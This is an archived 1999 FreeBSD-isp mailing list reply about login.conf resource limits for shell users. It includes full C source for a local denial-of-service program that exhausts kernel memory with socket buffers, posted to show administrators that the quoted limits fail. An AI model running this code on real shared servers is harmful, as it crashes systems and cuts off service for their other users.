Date: Thu, 4 Nov 1999 23:36:03 -0500 (EST) From: <up@3.am> To: Mike Tancsa <mike@sentex.net> Cc: freebsd-isp@freebsd.org Subject: Re: login.conf and resource limits Message-ID: <Pine.GSO.4.10.9911042331170.8377-100000@richard2.pil.net> In-Reply-To: <38224635.260144868@mail.sentex.net>
next in thread | previous in thread | raw e-mail | index | archive | help
I got news for you, that ain't going to stop the DoS. Compile and run
this code as a user from your shellu class It will crash your server, so
don't do it on a production box (BTW, I had checked the security list
archives and saw a thread on this, but no answers that worked):
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
exit(0);
}
On Fri, 5 Nov 1999, Mike Tancsa wrote:
> On 4 Nov 1999 21:00:01 -0500, in sentex.lists.freebsd.isp you wrote:
>
> >
> >This is what I came up with after checking out the man pages and examples
> >in login.conf. If someone who's addressed this has a good example default
> >config, that would be very helpful.
>
> shellu:\
> :cputime=infinity:\
> :datasize-cur=8M:\
> :datasize-max=8M:\
> :stacksize-cur=4M:\
> :stacksize-max=4M:\
> :memorylocked-cur=10M:\
> :memorylocked-max=10M:\
> :memoryuse-cur=10M:\
> :memoryuse-max=10M:\
> :filesize=infinity:\
> :coredumpsize=infinity:\
> :maxproc-cur=5:\
> :maxproc-max=5:\
> :openfiles-cur=64:\
> :openfiles-max=64:\
> :priority=0:\
> :requirehome@:\
> :umask=022:\
> :tc=auth-defaults:
>
> is what I use for my casual shell users... Dont forget
>
> cap_mkdb /etc/login.conf
>
> ---Mike
> Mike Tancsa (mdtancsa@sentex.net)
> Sentex Communications Corp,
> Waterloo, Ontario, Canada
> "Given enough time, 100 monkeys on 100 routers
> could setup a national IP network." (KDW2)
>
James Smallacombe PlantageNet, Inc. CEO and Janitor
up@3.am http://3.am
=========================================================================
ISPF 3 - The Forum for ISPs by ISPs(tm) || Nov 15-17, 1999, New Orleans
3 days of clues, news, and views from the industry's best and brightest.
Visit <http://www.ispf.com/>; for information and registration.
=========================================================================
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-isp" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.GSO.4.10.9911042331170.8377-100000>